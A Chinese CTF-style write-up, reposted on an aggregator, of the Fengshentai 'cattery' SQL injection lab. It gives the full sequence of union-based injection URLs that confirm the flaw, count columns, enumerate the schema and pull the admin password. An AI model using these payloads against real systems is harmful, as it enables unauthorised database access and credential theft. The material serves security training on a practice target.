【封神台】辛巴猫舍-SQL注入

news2024/9/30 21:21:24

本节学习目标：

判断是否存在SQL漏洞，以便注入
获取数据库的内容

本节需知：

SQL注入
%20为空格的url代码
环境为打靶环境

1. 判断是否存在SQL漏洞

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=1

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2

刚开始时1=1逻辑为真，页面正常显示；而后1=2逻辑为假，页面不正常显示：说明可以注入。

2. 判断字段数

http://cntj8003.ia.aqlab.cn/index.php?id=1%20order%20by%201

假设为1，正常显示。

http://cntj8003.ia.aqlab.cn/index.php?id=1%20order%20by%202

假设为2，正常显示。

http://cntj8003.ia.aqlab.cn/index.php?id=1%20order%20by%203

假设为3，不正常显示。

判定字段数为2。

3. 判断回显点

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,2

出现2，说明2就是回显字段。

4. 查询数据库

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,database()

出现maoshe，说明当前数据库为maoshe。

5. 查询数据库版本

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,version()

出现5.5.53，说明当前数据库版本为5.5.53。

6. 查询当前数据库表名

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

出现admin，说明当前数据库存在一个表admin，里面就可能存在管理员信息。

7. 查询字段名

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name%20=%20%27admin%27%20limit%200,1

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name%20=%20%27admin%27%20limit%201,1

http://cntj8003.ia.aqlab.cn/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name = %27admin%27 limit 2,1

当limit3，1时页面不正常显示，说明admin有三个字段，分别是id,username,password。

8.查询管理权限

http://cntj8003.ia.aqlab.cn/index.php?id=1%20and%201=2%20union%20select%201,username%20from%20admin%20limit%200,1

有一个用户admin。

当limit1，1时，有输出，limit2,1时无输出，也就是说这时候有两个用户，我们先尝试取admin的密码。

http://cntj8003.ia.aqlab.cn/index.php?id=1 and 1=2 union select 1,password from admin limit 0,1

得到密码hellohack

参考文献：

猫舍 writeup- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/96038.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

【封神台】辛巴猫舍-SQL注入

1. 判断是否存在SQL漏洞

2. 判断字段数

3. 判断回显点

4. 查询数据库

5. 查询数据库版本

6. 查询当前数据库表名

7. 查询字段名

8.查询管理权限

相关文章

注册VMware虚拟机时报错“指定的项、名称或标识符已存在“

图片识别转公式，GitHub 又一 LaTeX 神器面世

＜Linux进程通信之管道＞——《Linux》

【DevOps实战系列】第一章：详解DevOps运行环境

子序列的权值最小值

Nat. Commun. | 基于最优传输的单细胞数据集成统一计算框架

Linux C编程一站式学习笔记3

【linux】linux centos 6 日志服务、rsyslogd日志服务

测试人，为什么建议你要去大厂看一下，绝不仅仅是为了薪资和面子

python数据容器分类

Clipper库 | 坐标圆整和精度控制

Kerberos身份验证在ChunJun中的落地实践

Java——并查集

C语言tips-野指针

一文带你深入理解【Java基础】· IO流（上）

机器学习100天（五）：005 数据预处理之划分训练集

【LVGL学习笔记】（二）基础概念

心理健康网站

我的创作纪念日——为什么要写博客

哈夫曼树，哈夫曼编码及应用——（代码实现）